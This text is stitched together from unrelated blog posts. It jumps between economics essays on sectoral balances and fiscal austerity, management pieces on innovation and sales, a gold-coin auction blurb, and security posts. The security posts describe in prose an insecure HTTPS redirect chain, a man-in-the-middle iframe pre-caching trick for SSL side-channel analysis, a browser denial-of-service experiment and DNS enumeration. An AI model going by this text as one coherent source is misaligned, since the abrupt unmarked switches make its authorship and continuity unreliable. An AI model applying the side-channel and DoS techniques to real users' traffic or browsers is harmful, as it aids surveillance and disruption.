I like it when I discover that people are trying to get their hands on the talent in my teams.
It is nice when they ask if I mind first, but even if they don't, I still like it.
It is far better to have a team that everyone wants than one no-one care about.
Or even worse, one that no-one knows exists.

Note: This post will only format decently in a browser window opened very wide. The equations will probably be garbled in an RSS reader.

First and foremost, I owe Rob Parenteau a big apology. Parenteau is the originator and first user of the clever term “Austerian”, which I erroneously attributed to Mark Thoma. Thoma never claimed parentage. I first encountered the term on his blog and a quick Google search turned up no antecedents, so I went with that. But Google does not index everything. I apologize for the error, and thank Marshall Auerbach who first pointed it out to me.

Parenteau’s contributions go far beyond a catchy neologism, however. I recommend his most recent post at Naked Capitalism, which is the best use of the “sectoral balances approach” to economic analysis that I have seen in the blogosphere.

The “sectoral balances approach” (frequently attributed to Wynne Godley) decomposes financial stocks and flows by virtue of a tautology. Every financial asset is also some entity’s liability. The sum of all financial positions is by definition zero. So we can write:

NET_WORLD_FINANCIAL_POSITION = 0 [0]

Suppose that, quite arbitrarily, we divide the world into a “foreign” and a “domestic” sector. Then we have:

NET_FOREIGN_FINANCIAL_POSITION + NET_DOMESTIC_FINANCIAL_POSITION = NET_WORLD_FINANCIAL_POSITION = 0 [1]

NET_FOREIGN_FINANCIAL_POSITION + NET_DOMESTIC_FINANCIAL_POSITION = 0 [2]

Suppose that, again arbitrarily, we decompose the domestic economy into a public and private sector:

NET_PRIVATE_DOMESTIC_FINANCIAL_POSITION + NET_PUBLIC_DOMESTIC_FINANCIAL_POSITION = NET_DOMESTIC_FINANCIAL_POSITION [3]

Substituting into our previous expression, we get

NET_FOREIGN_FINANCIAL_POSITION + NET_PRIVATE_DOMESTIC_FINANCIAL_POSITION + NET_PUBLIC_DOMESTIC_FINANCIAL_POSITION = 0 [4]

We can also write this in terms of changes or flows. Since the sum above must always be zero, it must be true that any changes in one sector are balanced by changes in another:

ΔNET_FOREIGN_FINANCIAL_POSITION + ΔNET_PRIVATE_DOMESTIC_FINANCIAL_POSITION + ΔNET_PUBLIC_DOMESTIC_FINANCIAL_POSITION = 0 [5]

Two of the flows in the equation above have conventional names, so we can rewrite:

CURRENT_ACCOUNT_DEFICIT + ΔNET_PRIVATE_DOMESTIC_FINANCIAL_POSITION + CONSOLIDATED_GOVERNMENT_SURPLUS = 0 [6]

Rearranging…

ΔNET_PRIVATE_DOMESTIC_FINANCIAL_POSITION = -CURRENT_ACCOUNT_DEFICIT + -CONSOLIDATED_GOVERNMENT_SURPLUS [7]

ΔNET_PRIVATE_DOMESTIC_FINANCIAL_POSITION = CURRENT_ACCOUNT_SURPLUS + CONSOLIDATED_GOVERNMENT_DEFICIT [8]

This decomposition has been quite prominent in the blogosphere. I first encountered it in conversation with the always excellent Winterspeak, and associate it with the “Modern Monetary Theorists” or “chartalists”. But it’s been used widely, very recently for example by Martin Wolf.

The usual argument goes something like this: In the aftermath of a terrible credit bubble, in most countries, the private sector is desperate to “delever”, or reduce its indebtedness, which is equivalent to increasing its net financial position. As a matter of pure arithmetic, equation 8 must always be in balance. If the private sector of a country is to force the left-hand term positive, the country must either run a current account surplus (e.g. by exporting more than it imports) or else its government must run a deficit. Some countries may “export their way” to financial health, but not all can, since every current account surplus must be matched by a deficit elsewhere. If we put “beggar thy neighbor” strategies aside and set the current account to zero, any improvement in the financial position of the private sector must be offset by a deficit of the public sector.

This is true by definition. Once the terms have been defined, there is nothing to argue about. If we want the financial position of the private sector to improve (defined as increasing total financial assets less liabilities), and we consider a country whose external account is in balance or deficit, then the public sector must run a deficit.

However, a thing can be true but still misleading. The catch is an assumption, that an increase in the net financial position of the private sector is a good thing, something that we should encourage or at least accommodate. This is where Parenteau is great. He decomposes the domestic private sector into a household and business sector:

Δ(NET_HOUSEHOLD_FINANCIAL_POSITION + NET_BUSINESS_FINANCIAL_POSITION) = CURRENT_ACCOUNT_SURPLUS + CONSOLIDATED_GOVERNMENT_DEFICIT [9]

ΔNET_HOUSEHOLD_FINANCIAL_POSITION + ΔNET_BUSINESS_FINANCIAL_POSITION = CURRENT_ACCOUNT_SURPLUS + CONSOLIDATED_GOVERNMENT_DEFICIT [10]

(Note that “business” here means any non-household private entity that could have a financial position. It would include, for example, non-profit organizations.)

Let’s try to come up with better names for ΔNET_HOUSEHOLD_FINANCIAL_POSITION and ΔNET_BUSINESS_FINANCIAL_POSITION.

ΔNET_HOUSEHOLD_FINANCIAL_POSITION is just net household financial income.

NET_BUSINESS_FINANCIAL_POSITION is, by definition, all business financial assets minus all business liabilities (including shareholder equity). On a business’ balance sheet, “all business liabilities (including shareholder equity)” is necessarily the same as “total business assets”. So we can write:

NET_BUSINESS_FINANCIAL_POSITION = BUSINESS_FINANCIAL_ASSETS – BUSINESS_FINANCIAL_LIABILITIES_AND_EQUITY [11]

NET_BUSINESS_FINANCIAL_POSITION = BUSINESS_FINANCIAL_ASSETS – TOTAL_BUSINESS_ASSETS [12]

NET_BUSINESS_FINANCIAL_POSITION = -(TOTAL_BUSINESS_ASSETS – BUSINESS_FINANCIAL_ASSETS) [13]

NET_BUSINESS_FINANCIAL_POSITION = -BUSINESS_NONFINANCIAL_ASSETS [14]

Now use our new definitions to rewrite equation [10]:

NET_HOUSEHOLD_FINANCIAL_INCOME + Δ(-BUSINESS_NONFINANCIAL_ASSETS) = CURRENT_ACCOUNT_SURPLUS + CONSOLIDATED_GOVERNMENT_DEFICIT [15]

NET_HOUSEHOLD_FINANCIAL_INCOME – ΔBUSINESS_NONFINANCIAL_ASSETS = CURRENT_ACCOUNT_SURPLUS + CONSOLIDATED_GOVERNMENT_DEFICIT [16]

NET_HOUSEHOLD_FINANCIAL_INCOME = CURRENT_ACCOUNT_SURPLUS + CONSOLIDATED_GOVERNMENT_DEFICIT + ΔBUSINESS_NONFINANCIAL_ASSETS[17]

Now we can tell what I think is a much more informative story. It is not the “private sector” whose financial position needs to improve. Businesses exist to increase the value of their liabilities to shareholders and creditors. They do not “delever” by reducing the sum of those liabilities. “Leverage” properly refers to the ratio between different sorts of liabilities, debt versus equity, not the total quantity of claims. In a good economy, the financial indebtedness of business entities will be increasing, as the value their real assets grows! Growth in the “net private sector financial position” could come from an increase in household income (yay!) or a decrease in the value of real business assets (yuk!). We certainly shouldn’t make policy decisions based on promoting or accommodating such an ambiguous outcome. Instead, we should craft our policies to be consistent with what we actually want, which is household financial income. (Note that this analysis necessarily excludes nonfinancial income, such as unrealized gains or losses on the value of a home.)

Reviewing equation [17], there are three ways a nation can improve the financial positions of its household sector. It may (i) run a current account surplus, usually by exporting more than it imports; (ii) have the government run a deficit, improving household financial position by having the government run a deficit, or (iii) increase the value of business nonfinancial assets. Approach (i) can’t work for everyone, of course. Assuming external balance, it is obvious (at least to me) that approach (iii) is ideal. Parenteau, I think, agrees:

Remember the global savings glut you keep hearing about from Greenspan, Bernanke, Rajan, and other prominent neoliberals? Turns out it is a corporate savings glut. There is a glut of profits, and these profits are not being reinvested in tangible plant and equipment. Companies, ostensibly under the guise of maximizing shareholder value, would much rather pay their inside looters in management handsome bonuses, or pay out special dividends to their shareholders, or play casino games with all sorts of financial engineering thrown into obfuscate the nature of their financial speculation, than fulfill the traditional roles of capitalist, which is to use profits as both a signal to invest in expanding the productive capital stock, as well as a source of financing the widening and upgrading of productive plant and equipment.

What we have here, in other words, is a failure of capitalists to act as capitalists. Into the breach, fiscal policy must step unless we wish to court the types of debt deflation dynamics we were flirting with between September 2008 and March 2009. So rather than marching to Austeria, we need to kill two birds with one stone, and set fiscal policy more explicitly to the task of incentivizing the reinvestment of profits in tangible capital equipment.

So what is the role of approach (ii), which stimulus proponents and MMT-ers frequently advocate? Note how Parenteau phrases things: because “capitalists [fail] to act as capitalists”, because businesses are not increasing the value of their nonfinancial assets, fiscal policy must be employed to avoid “debt deflation dynamics”. Here we reach the formal limits of the sectoral balance approach. This style of analysis gives us no insight into the dynamics or distribution of financial positions within any of the categories we have carved out.

Nevertheless, consider the following (counterfactual) thought experiment. Imagine that the NET_HOUSEHOLD_FINANCIAL_POSITION is negative, and that people go nuts in a harmful way when they are formally insolvent. Suppose also that the current account cannot be brought to surplus, and that businesses cannot expand the value of their nonfinancial assets in a short time frame. Under these conditions, by running a deficit, government could create financial income for households until their net financial position turns positive and people stop behaving like antisocial lunatics. In this scenario, fiscal policy does nothing to change the real asset position of the economy. But by shifting around financial assets and liabilities, government alters the behavior of agents in the economy in a manner that improves future performance, increasing overall wealth.

In real economies, people may well behave in ways that are harmful to the economy when their financial positions are very tenuous, although their actions are more likely caused by illiquidity than lunacy. But in real economies, some people have strong financial positions while others have weak financial positions, and the sort of intervention described above would be useless if the income created by a stimulus went primarily to households that were not financially stressed. Government funds spent purchasing goods and services from existing firms, or deficits created by income or payroll tax cuts, go first to people who are already employed, or who already have financial claims on businesses, and these may not be the most stressed groups. Designing a “good” stimulus where the object is to alter the character of real behavior by shifting financial variables is well beyond the scope of this post, but it would necessarily involve distributional questions and complex behavioral assumptions. If you target a stimulus to the deeply indebted, you may improve their behavior, but damage the behavior of others who feel aggrieved that prudence went unrewarded. If it was me, I’d make flat transfers unrelated to income or employment status, so that on the one hand the program seems “fair” — the prudent benefit along with the bankrupt — yet on the other hand it is guaranteed to improve the financial position of even the worst-situated households.

What about approach (iii)? What could cause an increase in the value of business nonfinancial assets, improving household financial positions? Fundamentally, there are two ways: Businesses could borrow or use their own cash to purchase real assets from the household and government sectors (holding the public sector deficit constant), or else the value of existing business nonfinancial assets can somehow be made to increase. Parenteau suggests policies that would push businesses to purchase real assets. But note that any sort of increase in the valuation of business nonfinancial assets, including intangible assets, would be sufficient to improve the household-sector financial balance. That would include events as insubstantial as a pure inflation, but also real improvements in business productivity. Again, looking beyond where sectoral balances can take us, distribution matters. If “debt deflation dynamics” occurs primarily through households whose weak financial positions include few claims on businesses, then increasing the value of business nonfinancial assets might not help very much.

p.s. Edward Harrison offered a response to Parenteau’s piece that is very much worth reading. In particular, he focuses on the quality of business investment, a topic about which sectoral balance decomposition can tell us very little. Mechanically, low quality investment should improve the valuation of business nonfinancial assets less than high quality investment, and should therefore exert a drag on household financial balances. Harrison uses an Austrian (though not Austerian!) perspective to suggest that stimulus may reduce the quality of business investing, implying a trade-off between approaches (ii) and (iii) above.

[MMT Note] Agree or disagree, the “MMTers” are among the most interesting and provocative thinkers in the economics blogosphere. In addition to Winterspeak, I’d include Bill Mitchell, Warren Mosler, Scott Fullwiler (who occasionally writes at Economic Perspectives from Kansas City), Marshall Auerbach, and perhaps Parenteau himself in this group. I agree with much but not all of what the MMTers have to say. I have learned profoundly much from disagreeing and squabbling with them. I do hope that Kartik Athreya will someday have the pleasure.

Update 2010-07-01, 6:40 am EDT: For reasons I do not understand (my big fat finger?), this post “disappeared” for a few hours. It reverted from “published” to “draft” in WordPress. The post is back, and the comments seem to be intact, but my apologies to all for the disappearance!

A very clever man who worked at Microsoft once explained the problems with the Windows operating system to me like this:
General Electric make nuclear reactors and they make domestic kettles. What they don't do is use the same technology for each.
A kettle is not the same thing as a nuclear reactor, obviously, and clearly, trying to create a standard way of boiling water, no matter the application is folly.
But Microsoft have spent years building forcing a figurative standard for water boiling on us, no matter the application, from gaming to high end servers.
And the result is that Windows is adequate, but not brilliant when you want to run home applications. And it is adequate, but not brilliant for business apps as well.
Microsoft is not the only company that's guilty of this attempt to standardise. All large companies do it, from banks (with their lowest-common denominator product sets), to retail (the same experience each time, no matter the customer).
Standardisation is a race to the bottom. Build the thing that suits the most people possible. Reap economies of scale. Deliberately design out anything interesting  to those at the edge of the curve. 
We are wedded to standardisation in big organisations because it makes it feel like we're in control. The thing is, we're not in control. In fact, we're in less control the more standardised we get.
The more standardised you make something, the more you force those who don't fit the lowest-common-denominator profile to go outside the standard. THey are forced to do so because they are creative, or high achievers, or want to make a difference. Standardisation is an attempt to make them mediocre, and they won't put up with it.
The tighter you lock something down, the greater the chance you'll force a break with the standard. The more you standardise, the narrower the band of people who are perfectly satisfied. People who aren't satisfied often take matters into their own hands.  You're less in charge as a result.
The only time standardisation really works is when you have either a zombie customer base or a zombie workforce. If it is your highest goal to achieve either, good luck to you, and have all the standardisation you want. 
But if you want to innovate, delight customers, and have happy employees, find a way for them to break the standard with safety and surety. Most people aren't zombies, and when they're given a choice to not be one, they'll usually take it.
That's why Apple is now a bigger company than Microsoft, by the way. 

40 posts remaining…

Just a quick thought for a Friday afternoon. For a while I did informal questionnaires to friends and family and people in general who aren’t hardcore security people about what they type in when they’re going to their bank. The following are the kinds of answers I’d get:

• “I type in www.bank.com.”
• “I type ‘bank’ and hit ctrl-enter”
• “I type in http://www.bank.com”
• “I type in bank.com and hit enter”

But almost never (twice out of dozens of people) I’d hear someone say, “I type in https://www.bank.com” with the “s”. So let’s just for a second think about all the problems with these. Let’s take “bank.com” as an example.

• User types bank.com, which, depending on the browser is being sent on the wire as they type over HTTP for auto-complete
• The browser corrects the URL to be http://bank.com/ and makes a DNS request for “bank.com”
• The DNS server responds with an IP address
• The user makes a request to bank.com’s IP address over HTTP
• bank.com responds in unencrypted HTTP to the user’s browser and informs them that they should be speaking with www.bank.com, and redirects them there via a 301 or 302 redirect
• User’s browser makes another DNS request for www.bank.com
• DNS server responds with www.bank.com’s IP address
• Browser makes an HTTP connection to www.bank.com
• www.bank.com realizes that the user is connecting via HTTP and uses another redirect to send the user to https://www.bank.com (or often has a link on the page, asking the user to click it to log in which will take the user to HTTPS)
• User’s browser re-connects to port 443 and begins negotiating - and at this point is encrypted (hopefully using strong crypto and there are no other issues…)

There’s a lot of places there than an attacker can get in the middle and mess things up. And sadly, this isn’t even close to everything wrong in real life. So while HTTPS is a good idea, in practice how people tend to get there is pretty flawed. The promise of STS, HTTPS everywhere and some of the settings within NoScript and so on… was to take that out of the user’s hands. Not that these aren’t all good ideas, but there are usability issues, and require that the user be somewhat informed of the issues in most cases - which they don’t tend to be.

One for the gold crowd: Today one of 5 massive 100kg gold coins goes under the hammer in Vienna: The largest gold coin in the world — measuring 53 centimetres (21 inches) in diameter and weighing 100 kilograms (220 pounds) — will go on sale on June 25 in Vienna, auction house Dorotheum said on Friday. The Maple Leaf coin, which is listed in the Guinness Book of World Records and carries a face value of one million Canadian dollars (800,000 euros, 970,000 dollars), was minted in Canada in 2007. The auction price is expected to comfortably exceed the face value due to the current high price of gold. If mettled down, the gold would be worth around 3.9 million dollars (3.2 million euros). One side of the coin carries the carries the image of Queen Elizabeth II, the official head of state of Canada, while the other side bears three maple leafs, the national symbol. The coin was owned by Austrian investment firm AvW, which entered bankruptcy proceedings in May....

If you are doing something genuinely new, you can waste a lot of time tooling about trying to find someone with authority to say "Yes". Frankly, if  whatever-it-is is that new, no-one will know if they have the authority or not. 
So, unless you're asking the very top guy for permission, you're far better off assuming you have the authority yourself. 
Then, at least, you have the chance of asking for forgiveness. 
Instead of begging for mercy at review time because you've failed to do anything at all. 

41 more posts left until the end…

In regards to the previous post and the impending Blackhat speech with Josh Sokol, I thought I’d spend some time enumerating some of the possibilities for reducing the chatter over SSL/TLS that the browser introduces. There are a few things that an attacker generally doesn’t care about (not always, but generally). They generally don’t care about images, CSS, JavaScript, favicons, and most of the HTTP headers. That is, those parts of the HTML and HTTP request/response are generally less interesting than the content itself or what the user is sending. So there’s a few tricks we can use to force the user’s browser to cache the content prior to intentionally navigating there (call it pre-caching for lack of a better term).

Firstly, there’s a pretty good chance that an attacker can connect to the SSL/TLS encrypted website site in question and see what the HTTP response headers look like. Minus cookies, URL and POST data, an attacker can get a pretty accurate picture of what the HTTP response looks like. The attacker can also identify what sort of key exchange the user will be using with the site in question through a little enumeration. So the amount of data sent on the wire is smaller, and the data that is sent can be isolated to the few unknown components.

Next, an attacker can create an iframe (from a MITM’d HTTP website - the side channel) to the SSL/TLS encrypted site in question to pre-load all the images, JavaScript, CSS, favicons, and so on, that typically muddy the encrypted HTTP data flying in both directions. Lots of times the files in question are inconsequential to the page in question from the attacker’s perspective. But because browsers share sockets for multiple requests, often the chatter for these static objects can make determining what is on the wire much more difficult.

So by forcing the user’s browser to pre-cache the content, an attacker can get down to just the pages they are interested in and a few GET requests that return 304 Not Modified responses. That’s a much smaller footprint for the unrelated data than it would be if it weren’t cached. Now, it may not always be a good idea to pre-cache. Sometimes the content will be hosted on other subdomains or domains, and therefore won’t create the same amount of chatter over the socket, because it isn’t pulling that content from the same IP. Other times it may be useful to detect that a user is on a certain page, because some of the content is a very specific to that page in question and is a known size - alerting the attacker to the fact that the user being monitored is on the page in question.

In this way an attacker is really getting down to the exact parts of the data they are interested in. Obviously the earlier an attacker can do this the better - trying to cache after the fact doesn’t make a lot of sense, although using timing attacks an attacker may be able to tell where the user has been, interestingly enough (Chris Evans did a good writeup on this a while back).

1. There is no money. Organisations sometimes think you can get innovation without investment. They believe in an "innovation culture" where employees do new things as part of their day job. The reality is that innovative companies have creative employees and some kind of formal enablement. Enablement costs money. Companies that don't spend any (hoping that assigning a person or two to the innovation challenge will do), rarely do very much innovation.
2. Your boss is late majority, or worse, a laggard. They don't like new things, and always need plenty of positive reinforcement from people they trust before they'll even try something new. If they have an innovation programme, it is likely its been forced on them. They won't see the point of the work, and certainly won't support it.
3. Everything is controlled by the Finance Director. Another don't bother moment, because this individual will likely want to make sure of the business case for every single innovation you undertake. Because most really interesting things don't even start to pay off in the short term, chances are you'll get nothing major done. You'll be reduced to incrementalism (not that there's anything wrong with that, if that's what your innovation strategy is), and you may as well rename yourself the Lean Team, rather than the Innovation Team. 
4. The organisation is laser-focussed on core business. If this is the case, especially if it is because the organisation is in distress, then probably innovation will be considered a distraction. Oh, the right words will get said, but when the chips are down, the innovators will be told to go away. Retreat to the core is a classic strategy of an organisation that is disconnecting itself from change, for whatever reason.
5. The company is riding high on established product and service lines. There may be competitors, but for now the position is secure. Innovation will probably not be seen as all that necessary in the scheme of things, because there's nothing going wrong right now. Such organisations have no burning platform for innovation, therefore, none will happen.
6. Audit and governance functions are over-powerful. If your organisation is full of security people, audit people, and governance people with the power to call the shots, then you should consider whether to bother with innovation. These are not bad people, but the organisation has programmed them to shut down change in all its forms. To innovate, you first have to find a way to eliminate their power over the innovators. In many organisations, that's a task which is  practically impossible.
7. The organisations has never had a recovery from a near-death experience. Really innovative organisations have a generation of managers who were either with it when it started (when every day was a near death experience), or who went through a period where there was every chance of a close down. Without such people in place, there's no entrenched belief in the power of change. Ergo, no innovation.
8. Your innovators are stuck in IT. This is a hard one, but the reality is this. If you're an IT innovator, chances are you're there to find ways to "enable" better IT through innovation. This is all very well, but enablement of a support function has much less money associated with it than enablement of a core business line (which in turn, uses IT). Sooner or later, the innovation team will look less attractive as an investment than other available opportunities.
9. Your CEO is risk-averse. If this is true, then even the very best innovations, no matter how well constituted, are likely to fail. This will not be because the CEO doesn't "get" stuff. Rather, the amount of reassurance that he or she will need before they make a "go" decision is likely to be excessive. You can spend all your available time trying to convince everyone whom the CEO might consult of the value, and still miss a key individual that will plant the seeds of doubt. Then you'll have to start all over again.

42 posts left until my last…

For those of you who may not have seen it there is a very good paper partially by Microsoft Research and partially by Indiana.edu called Side-Channel Leaks in Web Applications: a Reality Today, a Challenge Tomorrow. Initially it really upset me off that this paper was written, not because it’s not excellent, but because it’s partially what I was going to be speaking about at Blackhat. Alas… they came out with it first, and frankly, I think they did a much better job at slicing and dicing with the math. So once being upset by being beaten to the punch had worn off Josh Sokol and I had to change the presentation that we’ll be doing at Blackhat, and we’ll only be glossing over this as a result. But please check it out, it must have taken quite a while to build up those abuse cases.

Anyway, the reason I originally started thinking about this was because of something from Bruce Schneier I read a decade or so ago (I believe it was in Applied Cryptography). It basically said that in certain crypto systems you could tell certain things about the people involved. For instance, if you had one user who sent an encrypted message to two users who then sent the same message to four users who then sent it to 8 and so on… you might be able to infer a chain of command (or, just as likely - a really funny/crude joke that no one wants their bosses to find out about).

But when you’re talking about HTML, you have a lot of things that sort of act as subordinates in the same way as a chain of command might. For instance, HTML can load JavaScript, CSS, Objects, etc… those can load more JavaScript, Images, Bindings, etc… All of that has a certain behavior in the browser, and in one way or another can be detected. So the trick is how do you detect it? The Indiana paper does a good job of enumerating some of those possibilities, but there are a lot of other tricks an attacker could use as a man in the middle to reduce the noise on the wire. That’s what the presentation is largely about. Anyway, check out the paper!

With Blackhat impending, and given how many individual issues I’ll be discussing, I thought I should start posting them here. That and the fact that I’m quickly approaching my 1000′th post (which, if I have my way will be my last on ha.ckers.org) means that I need to start wrapping up these issues into a neat little bow. I have 43 more, as of this post, so the clock is ticking. During my research for Blackhat I found a few things that were unrelated to the main content, and didn’t make sense to include in the presentation. So let’s start with a little user-initiated DoS that I was toying with. It’s using a bunch of frames and then throwing a recursive heap-spray into it. The heap-spray may or may not be a red-herring, but I got the best results when I used it compared to some of the other tests I ran.

On my system it gave me an odd set of errors. Typically with any type of recursion Firefox will eventually pop up the “A script on this page may be busy or it may have stopped responding.” error. This is no different, except for what script it thinks is misbehaving. The error alternates, but if I leave it running long enough sometimes I get “chrome://noscript/content/Main.js:2149″ sometimes I get “chrome://global/content/bindings/general.xml:0″ sometimes I get “file:///C:/Programe%20Files/Mozilla%20Firefox/components/nsContentPrefService:1012″ and so on… These may point to race conditions, memory overwriting or something equally bad. Perhaps someone with more time can do more with this, but it was kind of fun to play with. Anyway, please save your work before you try this, but here is the demo.

I finally broke down and bought a new bean bag chair. I had one of the older Sumo lounge models and I loved it, but the newer sway couple model is much more conducive to sitting down and doing work or reading a book. So, with an uber-comfy chair as a prerequisite, that is promptly the first thing I did. I’ve been meaning to find the time to sit down and read the ModSecurity Handbook by Ivan Ristic - the primary developer on the project. And is there any surprise? It’s really good.

Ivan has written an O’Reilly book in the past, so his approach to writing is very methodological. For instance, I’m always the skeptic about tools that add latency, and that’s one of the very first things he addresses - alleviating a lot of those questions in my mind, having not played with it much in a few years. He goes through a lot of the attack scenarios, the configuration, tactics and on and on. It’s very thorough. Of course it leaves you with a big question mark at the end - so what’s the future of mod_security really going to be? Hopefully just as bright in the future.

One of the things I particularly liked was that Ivan went through and explained how mod_security was never designed to be a panacea and it was intentionally designed to be a more straight-forward tool, solving things that he knew it could solve, without wasting time developing a tool to be everything to everyone. I like that it wasn’t trying to be something it’s not. It’s really refreshing to hear an author tell you why things were built the way they are, and even more refreshing when you agree with those decisions. It gives you a lot of insights into the development process. Anyway, it was a good book read while sitting on a comfy chair (I recommend both). Sometimes the simplest things in life are worth writing about. If you use mod_security or are looking for a good free solution you should check out Ivan’s book.

I’ve been on whatever planet I go to when I’m not writing. Don’t ask, your guess is as good as mine.

When I checked out out a few weeks ago, there was a debate raging on “fiscal austerity”. Checking back in, it continues to rage. In the course of about a half an hour, I’ve read about ten posts on the subject. See e.g. Martin Wolf and Yves Smith, Mike Konczal, and just about everything Paul Krugman has written lately. While I’ve been writing, Tyler Cowen has a new post, which is fantastic. Mark Thoma has delightfully named one side of the debate the “austerians”. [Update: "austerians" was actually coined by Rob Parenteau.] Surely someone can come up with a cleverly risqué coinage for those in favor of stimulus?

Here are some obvious points:

Austerity is stupid. Austerity is first-order stupid whenever there are people to whom the opportunity cost of providing goods and services that others desire is negative. To some economists, that sentence is a non sequitur. After all, nothing prevents people from providing goods and services for free, if doing the work is more beneficial to them than alternative uses of their time right? Economists who make this argument need to get out more. Doing paid work has social meaning beyond the fact of the activity, and doing what is ordinarily paid work for free has a very different social meaning. It is perfectly possible, and perfectly common, that a person’s gains from doing work are greater than their total pay, so that in theory you could confiscate their wages or pay them nothing and they would still do the job. But in practice, you can’t do that, because if you don’t actually pay them, it is no longer paid work. The nonmonetary benefits of work are inconveniently bundled with a paycheck. Under this circumstance, having the government pay for the work is welfare improving unless the second-order costs of government spending exceed both the benefits to the worker in excess of pay and the benefit to consumers or users of the goods and services purchased.

Stimulus is dangerous. The second-order costs of government spending are real, and we are very far from being able to understand or estimate them. Here are some second order costs:

1. Transfers of relative purchasing power from other citizens to the beneficiaries of government spending may call into question the legitimacy of the distribution of opportunity, wealth, and influence and of the government itself. Perceptions of make-work or corrupt contracting are deeply corrosive. Deficit spending commits government to future transfers that may come to seem undesirable or illegitimate.

2. Government spending choices may lead to lower quality uses of real resources than would have occurred if the government had not acted. Since economic activity is habit forming and temporary interventions become permanent, the cost of poor government choices can be high. It matters very much what work the government is paying for. Work must be well-tailored to the talents, interests, and future prospects of individuals. Employing people badly is much worse than just giving them money.

3. If funds are spent, directly or indirectly, on resources in scarce supply, prices may be harmfully propped or bid up. That might take the form of a general inflation, or a narrower effect on the prices of specific commodities or assets.

4. High levels of government debt may have a destabilizing effect on prices, increasing price volatility and impairing economic calculation even in the absence of a general inflation, or even in a deflation. Government obligations are liquid and hypothecable, and the availability of good collateral increases the degree to which subjective changes in relative valuation translate to changes in nominal pricing.

5. There exist theories of government solvency which suggest that the safety and value of currency is related to the indebtedness of the issuing government. Those theories may or may not be reasonable. They may or may not find support in the historical record. Regardless, to the degree they are widespread, they may be self-fulfilling. Whether sensible or sunspot, loss of confidence in a currency is possible. Currency crises represent a “tail risk” whose likelihood and cost are difficult to estimate.

There are second order benefits to stimulus as well as costs: multipliers, consumer confidence, etc. But these are also difficult to estimate.

Lying is optimal. The debate among public officials about austerity cannot be taken at face value. Savers really could flee the euro, dollar, yen or yuan. Interest rates here or there could suddenly spike. A sudden dash to gold is possible. None of these financial market events would directly affect the real resources at our disposal, but any of them could devastate our ability to organize economic behavior, and would call into question the legitimacy of economic outcomes and the stability of governments. For policymakers who seek positive short-to-medium term outcomes, the optimal strategy is to avoid the first-order costs of austerity by spending and avoid second-order costs #1 and #5 by obfuscating their spending as much as possible. Costs #2, #3, and #4 tend to bite over the medium-to-long term, leading policymakers to discount them. I think we should expect a lot more austerity theater than actual austerity, for better and for worse. Expect central bankers especially to preach austerity while intervening madly in the shadows. That’s just what they do. By the same reasoning, we should expect policymakers to justify their actions with a lot of intuitive but awful theory. As the Modern Monetary Theorists remind us, the analogy between a fiat-currency-issuing government and a budget-constrained household is poor. It is, nevertheless, the framework under which most citizens and savers understand government accounts, and forms the basis of conventional discourse. Irrespective of what is a better or worse description of reality, it is safer for policymakers to frame their communication in terms of conventional theory than to promote a profoundly destabilizing paradigm shift. Expect President Obama to keep talking about how we are “out of money” even though he knows better.

Economic choices are not scalar. I think the austerity debate is unhelpful. There are complicated trade-offs associated with government spending. If the question is framed as “more” or “less”, reasonable people will disagree about costs and benefits that can’t be measured. Even in a depression, cutting expenditures to entrenched interests that make poor use of real resources can be beneficial. Even in a boom, high value public goods can be worth their cost in whatever private activity is crowded out to purchase them. Rather than focusing on “how much to spend”, we should be thinking about “what to do”. My views skew activist. I think there are lots of things government can and should do that would be fantastic. A “jobs bill”, however, or “stimulus” in the abstract, are not among them. If we do smart things, we will do well. If we do stupid things, or if we hope for markets to figure things out while nothing much gets done, the world will unravel beneath us. We have intellectual work to do that goes beyond choosing a deficit level. The austerity/stimulus debate is make-work for the chattering classes. It’s conspicuous cogitation that avoids the hard, simple questions. What, precisely, should we do that we are not yet doing? What are the things we do now that we should stop doing? And how can we make those changes without undermining the deep social infrastructure of our society, resources like legitimacy, fairness, and trust?

FD: I’m long precious metals and short long-term Treasuries. (My exposure to both is primarily via futures.) So perhaps I am thinking my book when I take the tail risk of currency crises more seriously than others do.

Update History:

• 29-June-2010, 11:50 p.m. EDT: Added update attributing coinage of “austerians” to Rob Parenteau. Thanks to Marshall Auerbach for pointing this out in the comments, and Barry Ritholtz for investigating.

What follows is another excerpt from my forthcoming volume on the way the enterprise sale appears from the inside:

"Gone native” is generally hated by Sales Directors because their traditional tools of control: the pipeline, the contact reports, the CRM systems, and, ultimately the target, are all pretty much incidental to the gone-native. Gone-Natives do what is required in order to keep their jobs, but are concerned primarily with becoming as close as possible to being an employee of the customer.

What are the behaviours of a gone-native Account Director then? Here are some observations I’ve made watching some of the best and brightest I could find.

Firstly, they’ll hardly ever see the resources they get assigned to make sales as their key asset. In fact, if they get more sales people assigned to them, they are just as likely to refuse than accept. They know that customer will come to them for help in any appropriate situation, because they are trusted. There’s no need to shove propositions down the customer’s throats in order to get new business. The Gone-Native Account Director is more likely to request resources which are ordinarily paid-for. They’ll fight tooth and nail to get them, too, because their number one priority is serving their friends, not making money from them. The internal challenges they face in doing so is likely to be shared with the customer, too, and the customer will probably be extremely sympathetic, rather than just bored with all the machinations their Account Director is going through. Friends, after all, look after each other and try to support each other through difficult situations.

Another sign of gone-native is when there are overly familiar personal relationships that develop, quite outside the normal professional ones. For example, if your Account Director is invited over to the homes of customers for social reasons, its a pretty fair bet you’ve got a gone-native on your hands. I have never seen this happen - ever- with an Account Director who plays relationships in order to optimise economic returns.  But it happens all the time with those who have a deep, and real, concern for their customer.

But the best sign of gone-native is when Account Directors start putting up walls inside your sales organisation to limit the amount of contact other sales resources have with their customer. There will be many excuses for this, but the real meat of the issue for the gone-native Account Director is that they’re embarrassed by the traditional sales approach. They have developed real, abiding friendships. They are doing genuine, partner-forming work. The last thing they need is for some senior person who focusses on economic returns banging around upsetting the applecart.

And upset it they will. It is so obvious to the customer when someone new shows up that has one thing on their mind: doing what they need to do to extract money. A gone native account director is right to be embarrassed. The fact that they allowed a genuine relationship to be abused by someone who has their own selfish interests at heart is mortifying.

With the impending release of Fierce 2.0 I thought I’d spend a minute talking about finding high value targets. I was working with a company in a specific vertical when I realized they use a very large single back end provider (essentially a cloud-based SaaS). But they aren’t the only large company using that SaaS - there are many hundreds of other companies using them as well. But because I’m not in that particular industry and having not worked much in that vertical, I had never even heard of them before. Frankly, I had no idea that they even existed. Now let’s take a typical Fierce DNS enumeration scan; it can find a lot of non-contiguous IP space, sure. But what about when I launch scans against hundreds of companies in that same vertical? Some interesting results start bubbling up.

